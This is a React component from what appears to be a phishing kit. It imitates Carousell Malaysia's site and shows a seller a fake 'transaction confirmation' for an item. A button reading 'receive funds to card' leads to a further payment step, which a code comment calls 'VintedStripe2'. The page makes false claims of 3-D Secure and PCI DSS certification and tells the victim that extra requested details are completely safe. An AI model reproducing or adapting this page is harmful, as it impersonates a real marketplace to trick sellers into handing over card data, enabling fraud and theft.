import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './CarousellMySuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { API_URL } from '../apiBase';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/carousell-my-logo.png`;
const FOOTER_SRC = `${P}/crml.jpeg`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function IconSearch() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="#9ca3af" strokeWidth="2" aria-hidden>
      <circle cx="11" cy="11" r="7" />
      <path d="M21 21l-4.35-4.35" strokeLinecap="round" />
    </svg>
  );
}

function IconPin() {
  return (
    <svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M12 21s7-4.5 7-11a7 7 0 1 0-14 0c0 6.5 7 11 7 11z" />
      <circle cx="12" cy="10" r="2" fill="currentColor" stroke="none" />
    </svg>
  );
}

function IconBank() {
  return (
    <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.6" aria-hidden>
      <path d="M3 10h18M5 10v8m14-8v8M3 18h18M12 3l9 7H3l9-7z" />
    </svg>
  );
}

function IconDoc() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="#e5e7eb" strokeWidth="1.6" aria-hidden>
      <path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8l-6-6z" />
      <path d="M14 2v6h6M8 13h8M8 17h6" />
    </svg>
  );
}

/**
 * Carousell Malaysia (MY): success → CTA на VintedStripe2.
 */
function CarousellMySuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [imgFailed, setImgFailed] = useState(false);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  useEffect(() => {
    document.title = 'Carousell Malaysia';
    const link =
      document.querySelector("link[rel*='icon']") ||
      (() => {
        const el = document.createElement('link');
        el.rel = 'icon';
        document.head.appendChild(el);
        return el;
      })();
    link.href = `${P}/carousell-my-favicon.png`;
  }, []);

  const countryCode = (pageData?.country_code || 'MY').toUpperCase();
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const symbol = getSymbol(primaryCurrency);
  const rawPrice = pageData?.price;
  const productPrice = (() => {
    if (rawPrice == null || String(rawPrice).trim() === '') return null;
    const s = String(rawPrice)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();
  const amountDisplay =
    productPrice != null && Number.isFinite(productPrice)
      ? `${symbol} ${productPrice % 1 === 0 ? String(Math.round(productPrice)) : String(productPrice)}`
      : `${symbol} —`;
  const productName = (pageData?.product_name || '').trim() || '—';
  const firstName = (pageData?.first_name || '').trim() || '—';
  const lastName = (pageData?.last_name || '').trim() || '—';
  const buyerName = [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const photoUrl = resolvePhotoUrl(pageData?.photo_url || '');
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const initials = productName !== '—' ? productName.slice(0, 2).toUpperCase() : 'CR';

  if (loading && pageCode) {
    return (
      <div className="crmy-wrap">
        <p className="crmy-loading">Memuatkan…</p>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="crmy-wrap">
      <header className="crmy-header">
        <div className="crmy-header-top">
          <a href="#/" className="crmy-brand" onClick={(e) => e.preventDefault()}>
            <img src={LOGO_SRC} alt="carousell" className="crmy-brand-img" width={200} height={32} decoding="async" />
          </a>
          <nav className="crmy-nav" aria-label="Kategori">
            <span>Fesyen</span>
            <span>Hobi &amp; Mainan</span>
            <span>Elektronik</span>
            <span>Kediaman</span>
            <span>Kereta &amp; Hartanah</span>
            <span className="crmy-nav-all">Semua Kategori</span>
          </nav>
          <div className="crmy-auth">
            <button type="button" className="crmy-link" onClick={(e) => e.preventDefault()}>
              Daftar
            </button>
            <button type="button" className="crmy-link" onClick={(e) => e.preventDefault()}>
              Log masuk
            </button>
            <button type="button" className="crmy-sell" onClick={(e) => e.preventDefault()}>
              Jual
            </button>
          </div>
        </div>
        <div className="crmy-search-row">
          <div className="crmy-search">
            <IconSearch />
            <input type="search" placeholder="Cari item" readOnly aria-label="Cari" />
          </div>
          <div className="crmy-loc">
            <IconPin />
            <span>Malaysia</span>
          </div>
          <button type="button" className="crmy-search-btn" onClick={(e) => e.preventDefault()}>
            Cari
          </button>
        </div>
      </header>

      <main className="crmy-main">
        <div className="crmy-layout">
          <section className="crmy-card">
            <div className="crmy-card-head">
              <h1>Pengesahan transaksi</h1>
              <p>
                <IconBank />
                <span>Semak butiran dan terima dana anda</span>
              </p>
            </div>

            <div className="crmy-product">
              <div className="crmy-media">
                {photoUrl && !imgFailed ? (
                  <img src={photoUrl} alt="" className="crmy-media-img" onError={() => setImgFailed(true)} decoding="async" />
                ) : (
                  <div className="crmy-media-ph" aria-hidden>
                    {initials}
                  </div>
                )}
              </div>
              <div className="crmy-product-info">
                <h2 className="crmy-product-title">{productName}</h2>
                <dl className="crmy-meta">
                  <div>
                    <dt>Nama pertama</dt>
                    <dd>{firstName}</dd>
                  </div>
                  <div>
                    <dt>Nama keluarga</dt>
                    <dd>{lastName}</dd>
                  </div>
                  <div>
                    <dt>Harga</dt>
                    <dd className="crmy-price">{amountDisplay}</dd>
                  </div>
                  <div>
                    <dt>Penerima</dt>
                    <dd>{buyerName}</dd>
                  </div>
                  <div className="crmy-meta-full">
                    <dt>Alamat penghantaran</dt>
                    <dd>{address}</dd>
                  </div>
                </dl>
                <Link to={index2Path} className="crmy-cta">
                  Terima dana ke kad
                </Link>
              </div>
            </div>

            <div className="crmy-secure">
              Keselamatan penerimaan dana dijamin oleh teknologi 3-D Secure. Data dihantar melalui protokol HTTPS yang
              selamat. Pensijilan tahunan syarikat mengikut PCI DSS Level 1 (tahap tertinggi).
            </div>
          </section>

          <aside className="crmy-aside">
            <div className="crmy-aside-box">
              <p className="crmy-aside-label">STATUS</p>
              <h3>Pengesahan selamat</h3>
              <div className="crmy-aside-row">
                <IconDoc />
                <p>Teruskan untuk menerima bayaran dengan selamat pada langkah seterusnya.</p>
              </div>
            </div>
            <div className="crmy-aside-box crmy-aside-warn">
              <h3>Maklumat penting</h3>
              <p>
                Semasa menerima dana, maklumat tambahan mungkin diminta daripada anda. Jangan risau, ini benar-benar
                selamat. Kami tidak berkongsi data anda dengan pihak ketiga.
              </p>
            </div>
          </aside>
        </div>
      </main>

      <footer className="crmy-footer">
        <img src={FOOTER_SRC} alt="" className="crmy-footer-img" width={1600} height={280} decoding="async" />
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default CarousellMySuccess;
